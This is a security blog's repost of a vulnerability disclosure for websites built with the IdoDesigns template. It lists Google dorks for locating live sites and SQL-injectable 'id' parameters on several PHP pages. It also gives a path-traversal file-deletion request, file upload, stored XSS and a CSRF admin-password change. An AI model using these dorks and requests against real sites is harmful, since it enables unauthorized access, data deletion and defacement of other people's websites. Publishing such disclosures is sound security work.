Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > IdoDesigns - Multiple Vulnerabilities

.:. Google @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > IdoDesigns - Multiple Vulnerabilities

.:. Google Dorks .:.
"Design by www.idodesigns.in"
"Web Design by : www.idodesigns.in"
"Design by : I DO Designs"
You may use the dorks followed by inurl:?id= like ["Design by : I DO Designs" inurl:?id=]

.:. Date: March 05,2025
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.idodesigns.in/
.:. Product Version -> 1.0
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Most PHP pages failed to secure parameters from SQLi resulting in Unauthorised SQL Injection with some using Base64 to help secure it but its insufficient, examples:
/blog-details.php?id=
/services-details.php?id=
/gallery-more.php?id=
/award-details.php?id=
/program-details.php?id=
/project-details.php?id=
/photos.php?id=


Admin Page [Authenticated] Multiple Exploits
1- Authenticated Arbitrary File Deletion:
Parameter -> image
GET https://site/ADMIN PAGE/blogAdd.php?delete_image=&img_id=1&id=3&image=../../../index.php

2- Authenticated Arbitrary File Upload:
POST https://site/ADMIN PAGE/blogAdd.php?edit=1&id=3
Parameter -> images[]

3- Stored XSS:
Most [POST] requests to edit pages or posts or users have vulnerable parameters that store XSS which can result in website defacement

4- CSRF is possible to update admin password
File: /site/admin page/changePassword.php
parameters & data: new_pwd=x&confirm_pwd=x&submit=
Social Media Share